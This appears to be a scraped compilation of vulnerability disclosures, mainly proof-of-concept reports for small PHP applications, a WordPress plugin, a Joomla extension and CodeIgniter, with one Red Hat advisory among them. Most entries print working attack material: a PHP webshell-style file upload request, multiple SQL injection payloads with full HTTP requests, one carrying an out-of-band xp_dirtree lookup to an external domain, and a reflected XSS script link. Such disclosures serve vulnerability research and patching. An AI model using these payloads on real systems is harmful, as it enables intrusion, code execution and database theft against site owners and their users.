An arbitrary file upload vulnerability in the component /php_action/editFile.php of Online Diagnostic Lab Management System v1.0 allows attackers to execute arbitrary code via a crafted PHP file.

Permalink

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has arbitrary code execution (RCE)**

BUG\_Author: Via

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

Vulnerability url: ip/diagnostic/php\_action/editFile.php?id=1

Loophole location: Online Diagnostic Lab Management System's editFile.php file exists arbitrary file upload (RCE)

Request package for file upload：

POST /diagnostic/php\_action/editFile.php?id\=1 HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.88/diagnostic/editorder.php?id=1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------269801976022857
Content-Length: 431
\-----------------------------269801976022857
Content-Disposition: form-data; name="old\_image"
Z614.pdf
\-----------------------------269801976022857
Content-Disposition: form-data; name="productImage"; filename="se.php"
Content-Type: application/octet-stream
<?php phpinfo(); ?>
\-----------------------------269801976022857
Content-Disposition: form-data; name="btn"
\-----------------------------269801976022857--

The files will be uploaded to this directory \\diagnostic\\assets\\myimages\\

We visited the directory of the file in the browser and found that the code had been executed

CVE-2022-41512: bug_report/RCE-1.md at main · TGAyouman/bug_report

Two cross-site scripting vulnerabilities were fixed in Bodhi 5.6.1.

CVE-2020-15855: bodhi Changelog - pyup.io

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_payment.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_payment

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_payment, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_payment HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41515: bug_report/SQLi-2.md at main · TGAyouman/bug_report

Open Source SACCO Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /sacco_shield/ajax.php?action=delete_loan.

Permalink

Cannot retrieve contributors at this time

**Open Source SACCO Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/admin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15372/open-source-sacco-management-system-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /sacco\_shield/ajax.php?action=delete\_loan

Vulnerability location: /sacco\_shield/ajax.php?action=delete\_loan, id

dbname = sacco,length=5

\[+\] Payload: id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /sacco\_shield/ajax.php?action\=delete\_loan HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
id=1 and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-41514: bug_report/SQLi-1.md at main · TGAyouman/bug_report

Online Diagnostic Lab Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /diagnostic/edittest.php.

**Online Diagnostic Lab Management System v1.0 by mayuri\_k has SQL injection**

BUG\_Author: Via

Login account: mayuri.infospace@gmail.com/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /diagnostic/edittest.php?id=

Vulnerability location: /diagnostic/edittest.php?id=, id

dbname = diagnostic

\[+\] Payload: /diagnostic/edittest.php?id=-1%27%20union%20select%201,database(),3,4,5,6,7,8,9--+ // Leak place ---> id

GET /diagnostic/edittest.php?id\=\-1%27%20union%20select%201,database(),3,4,5,6,7,8,9\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=flklolh755oivesj89eu5fo2c7
Connection: close

CVE-2022-41513: bug_report/SQLi-1.md at main · TGAyouman/bug_report

Red Hat Security Advisory 2022-6835-01 - This release of Red Hat Integration - Service registry 2.3.0.GA serves as a replacement for 2.0.3.GA, and includes the below security fixes. Issues addressed include code execution, cross site scripting, denial of service, deserialization, and privilege escalation vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Service Registry (container images) release and security update [2.3.0.GA]  
Advisory ID:       RHSA-2022:6835-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6835  
Issue date:        2022-10-06  
CVE Names:         CVE-2021-22569 CVE-2021-37136 CVE-2021-37137  
                   CVE-2021-41269 CVE-2022-0235 CVE-2022-0536  
                   CVE-2022-0981 CVE-2022-21724 CVE-2022-23647  
                   CVE-2022-24771 CVE-2022-24772 CVE-2022-24773  
                   CVE-2022-25647 CVE-2022-25857 CVE-2022-25858  
                   CVE-2022-26520 CVE-2022-31129 CVE-2022-37734  
====================================================================  
1. Summary:

An update to the images for Red Hat Integration Service Registry is now  
available from the Red Hat Container Catalog. The purpose of this text-only  
errata is to inform you about the security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

This release of Red Hat Integration - Service registry 2.3.0.GA serves as a  
replacement for 2.0.3.GA, and includes the below security fixes.

Security Fix(es):

* cron-utils: template Injection leading to unauthenticated Remote Code  
Execution (CVE-2021-41269)

* prismjs: improperly escaped output allows a XSS (CVE-2022-23647)

* snakeyaml: Denial of Service due missing to nested depth limitation for  
collections (CVE-2022-25857)

* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)

* protobuf-java: potential DoS in the parsing procedure for binary data  
(CVE-2021-22569)

* quarkus: privilege escalation vulnerability with RestEasy Reactive scope  
leakage in Quarkus (CVE-2022-0981)

* quarkus-jdbc-postgresql-deployment: jdbc-postgresql: Unchecked Class  
Instantiation when providing Plugin Classes (CVE-2022-21724)

* netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may  
buffer skippable chunks in an unnecessary way (CVE-2021-37137)

* netty-codec: Bzip2Decoder doesn't allow setting size restrictions for  
decompressed data (CVE-2021-37136)

* node-fetch: exposure of sensitive information to an unauthorized actor  
(CVE-2022-0235)

* follow-redirects: Exposure of Sensitive Information via Authorization  
Header leak (CVE-2022-0536)

* jdbc-postgresql: postgresql-jdbc: Arbitrary File Write Vulnerability  
(CVE-2022-26520)

* node-forge: Signature verification leniency in checking `digestAlgorithm`  
structure can lead to signature forgery (CVE-2022-24771)

* node-forge: Signature verification failing to check tailing garbage bytes  
can lead to signature forgery (CVE-2022-24772)

* node-forge: Signature verification leniency in checking `DigestInfo`  
structure (CVE-2022-24773)

* com.google.code.gson-gson: Deserialization of Untrusted Data in  
com.google.code.gson-gson (CVE-2022-25647)

* terser: insecure use of regular expressions leads to ReDoS  
(CVE-2022-25858)

* graphql-java: DoS by malicious query (CVE-2022-37734)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2004133 - CVE-2021-37136 netty-codec: Bzip2Decoder doesn't allow setting size restrictions for decompressed data  
2004135 - CVE-2021-37137 netty-codec: SnappyFrameDecoder doesn't restrict chunk length and may buffer skippable chunks in an unnecessary way  
2024632 - CVE-2021-41269 cron-utils: template Injection leading to unauthenticated Remote Code Execution  
2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data  
2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor  
2050863 - CVE-2022-21724 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes  
2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak  
2056643 - CVE-2022-23647 prismjs: improperly escaped output allows a XSS  
2062520 - CVE-2022-0981 quarkus: privilege escalation vulnerability with RestEasy Reactive scope leakage in Quarkus  
2064007 - CVE-2022-26520 postgresql-jdbc: Arbitrary File Write Vulnerability  
2067387 - CVE-2022-24771 node-forge: Signature verification leniency in checking `digestAlgorithm` structure can lead to signature forgery  
2067458 - CVE-2022-24772 node-forge: Signature verification failing to check tailing garbage bytes can lead to signature forgery  
2067461 - CVE-2022-24773 node-forge: Signature verification leniency in checking `DigestInfo` structure  
2080850 - CVE-2022-25647 com.google.code.gson-gson: Deserialization of Untrusted Data in com.google.code.gson-gson  
2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS  
2126277 - CVE-2022-25858 terser: insecure use of regular expressions leads to ReDoS  
2126789 - CVE-2022-25857 snakeyaml: Denial of Service due to missing nested depth limitation for collections  
2126809 - CVE-2022-37734 graphql-java: DoS by malicious query

5. References:

https://access.redhat.com/security/cve/CVE-2021-22569  
https://access.redhat.com/security/cve/CVE-2021-37136  
https://access.redhat.com/security/cve/CVE-2021-37137  
https://access.redhat.com/security/cve/CVE-2021-41269  
https://access.redhat.com/security/cve/CVE-2022-0235  
https://access.redhat.com/security/cve/CVE-2022-0536  
https://access.redhat.com/security/cve/CVE-2022-0981  
https://access.redhat.com/security/cve/CVE-2022-21724  
https://access.redhat.com/security/cve/CVE-2022-23647  
https://access.redhat.com/security/cve/CVE-2022-24771  
https://access.redhat.com/security/cve/CVE-2022-24772  
https://access.redhat.com/security/cve/CVE-2022-24773  
https://access.redhat.com/security/cve/CVE-2022-25647  
https://access.redhat.com/security/cve/CVE-2022-25857  
https://access.redhat.com/security/cve/CVE-2022-25858  
https://access.redhat.com/security/cve/CVE-2022-26520  
https://access.redhat.com/security/cve/CVE-2022-31129  
https://access.redhat.com/security/cve/CVE-2022-37734  
https://access.redhat.com/security/updates/classification/#important

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYz7stNzjgjWX9erEAQiCEQ/+OPmlKRufUR1D+rRvhWHeBMxdJ9NMoaMm  
rV3uH/FIiBLFSYWXgTY8gb53BVsZHEPfZ6G3ol70iyOjDbXazQsYBuhg/9RMLmz9  
+J1yK5sSeE9HyisYbYdHuuGIKpEMGXp78NP1rlwBEgyFrkY8pJHSdv/Fc87f2B3Z  
VeExd/Zvdcj5M4/ZmCin1yNALPKlhnbp9+9MGvcLufJUsXxOKPrQVCYMgWVWc0Wc  
aNRm4y8FBOnYrB9FeA2BBYEpmBrRK8G8OsoebuqaBvKAvytVV/NSiOMKsdaGD9WL  
XeLPl5XE3rpEVeUEH4aEjdHe6weLk/sjst335xgWI7QHZT/gjZxmxza2TBGgIkRJ  
yBT/n63geWAkaTXUCP0oepJDPKAio6B/CFVzTZS8jqO/0rDDvHIZN94nhceqamW3  
GC5gha56Pk+qcw3sArvtu0G72wY5O/+/kxp0mV+sWczIIlbS7FlkG+sxl5uHo3+M  
DDBOMwNROI6bInBxnBD4GWMepW40cGaAXt1HN/1NVaZq0mw4cdyulOMJfPpJGQK5  
IGS+TnvZn86p3cZysR3eMuaPzFG9U8vnaAw8enRmiJ6wG3NFkklIRelO7fEF8n3R  
drGnqa8gB589c9x3QUurBytdDxYWd2T71TOTyMFdTI9NtOAeuIvX+6lDj0BOftH3  
Jnw+PamuYNcÌnF  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6835-01

Joomla Vik Booking extension version 1.15.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Booking 1.15.0                                                  ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php/en/bookingGET parameter 'categories' is vulnerable to XSShttps://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103[-] Done

Joomla Vik Booking 1.15.0 Cross Site Scripting

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

WordPress Zephyr Project Manager 3.2.42 SQL Injection

B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php.

**Multiple functions of CodeIgniter have SQL injection****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

3.0rc <= CodeIgniter <= 3.1.13

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.39

**Vulnerability Details**

CodeIgniter is an Application Development Framework - a toolkit - for people who build web sites using PHP.

SQL injection exists for multiple functions in CodeIgniter, and the versions involved are 3.0rc to 3.1.13

The functions involved are where()、or\_where()、having()、or\_having()、where\_in()、or\_where\_in()、where\_not\_in()、or\_where\_not\_in()、like()、or\_like()、not\_like() and or\_not\_like().

The functions listed above do not filter the query fields. If the developer obtains the query fields from the client, the attacker can modify the query fields and trigger SQL injection.

**Describe**

    File:
        system\database\DB_query_builder.php
    
    Core Functions:
        protected function _wh($qb_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)    //662
        protected function _where_in($key = NULL, $values = NULL, $not = FALSE, $type = 'AND ', $escape = NULL)   //804
        protected function _like($field, $match = '', $type = 'AND ', $side = 'both', $not = '', $escape = NULL)    //947
    
    _wh() Explain
        //The following section provides the complete function code.
        ${$qb_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
        _wh() does not filter $k before splicing $prefix and $k. If we can control $k, SQL injection will be triggered.
        _where_in() and _like() have the same situation.
    
    Public Funtions
        Although  _wh()、where_in() and _like() are protected, but CodeIgniter provides some public functions.
        _wh()
            where()
            or_where()
            having()
            or_having()
        _where_in()        
            where_in()
            or_where_in()
            where_not_in()
            or_where_not_in()
        _like()        
            like()
            or_like()
            not_like()
            or_not_like()
    

protected function \_wh($qb\_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)
{
   $qb\_cache\_key = ($qb\_key === 'qb\_having') ? 'qb\_cache\_having' : 'qb\_cache\_where';
   if ( ! is\_array($key))
   {
   	$key = array($key => $value);
   }
   // If the escape value was not set will base it on the global setting
   is\_bool($escape) OR $escape = $this\->\_protect\_identifiers;
   foreach ($key as $k => $v)
   {
   	$prefix = (count($this\->$qb\_key) === 0 && count($this\->$qb\_cache\_key) === 0)
   		? $this\->\_group\_get\_type('')
   		: $this\->\_group\_get\_type($type);
   	if ($v !== NULL)
   	{
   		if ($escape === TRUE)
   		{
   			$v = $this\->escape($v);
   		}
   		if ( ! $this\->\_has\_operator($k))
   		{
   			$k .= ' = ';
   		}
   	}
   	elseif ( ! $this\->\_has\_operator($k))
   	{
   		// value appears not to have been set, assign the test to IS NULL
   		$k .= ' IS NULL';
   	}
   	elseif (preg\_match('/\\s\*(!?=|<>|\\sIS(?:\\s+NOT)?\\s)\\s\*$/i', $k, $match, PREG\_OFFSET\_CAPTURE))
   	{
   		$k = substr($k, 0, $match\[0\]\[1\]).($match\[1\]\[0\] === '=' ? ' IS NULL' : ' IS NOT NULL');
   	}
   	${$qb\_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
   	$this\->{$qb\_key}\[\] = ${$qb\_key};
   	if ($this\->qb\_caching === TRUE)
   	{
   		$this\->{$qb\_cache\_key}\[\] = ${$qb\_key};
   		$this\->qb\_cache\_exists\[\] = substr($qb\_key, 3);
   	}
   }
   return $this;
}

**Verification(3.1.13)**

    Code Download
        https://github.com/bcit-ci/CodeIgniter/releases/tag/3.1.13
    Apache needs to add the following in .htaccess
        <IfModule mod_rewrite.c>
        Options +FollowSymlinks -Multiviews
        RewriteEngine On
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteRule ^(.*)$ index.php?/$1 [QSA,PT,L]
        </IfModule>
    Environment Construction
        The detailed process is omitted, and the final result is as follows.
    

    File Modification
        1. Edit database configuration file application\config\database.php.
        As a test, I used the information schema of mysql system database 'information-schema'.
    

        2. Download the Sql.php file and move it to the application\controllers\ folder.
        Sql.php uses data table 'engines'.
    

    Try SQL Injection
        1. Normal access 
        Query with the field 'ENGINE'.
        Because the query conditions are different, the results are displayed differently.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE
    

        2.Malicious access
        SQL injection through fields.
        The 12 functions above all display the database name.
        SQL injection will occur when careless developers use fields sent by the front end.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE like '*' union select database(),2,3,4,5,6 -- -
    

  

**Verification(3.0rc)**

  

**Verification(3.1.1)**

CVE-2022-40835: CodeIgniter3.1.13-SQL-Inject/README.md at main · 726232111/CodeIgniter3.1.13-SQL-Inject

An SQL injection vulnerability issue was discovered in Sourcecodester Simple E-Learning System 1.0., in /vcs/classRoom.php?classCode=, classCode.

Permalink

Cannot retrieve contributors at this time

**Simple E-Learning System by oretnom23 has SQL injection**

BUG\_Author：xtxxueyan

vendors: https://www.sourcecodester.com/php-simple-e-learning-system-source-code

Vulnerability File: /vcs/classRoom.php?classCode=

Vulnerability location: /vcs/classRoom.php?classCode=, classCode

dbname = vcs\_db

**time-based blind**

Payload: /vcs/classRoom.php?classCode=-9082' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,sleep(5),NULL-- - // Leak place ---> classCode

**boolean-based blind**

Payload: /vcs/classRoom.php?classCode=class101\_a' AND 6907=6907 AND 'TSIZ'='TSIZ // Leak place ---> classCode

Payload: /vcs/classRoom.php?classCode=class101\_a' AND 6907=6907 AND 'TSIZ'='TSIQ // Leak place ---> classCode

sqlmap can inject it，can query the database in use now

Tag

#sql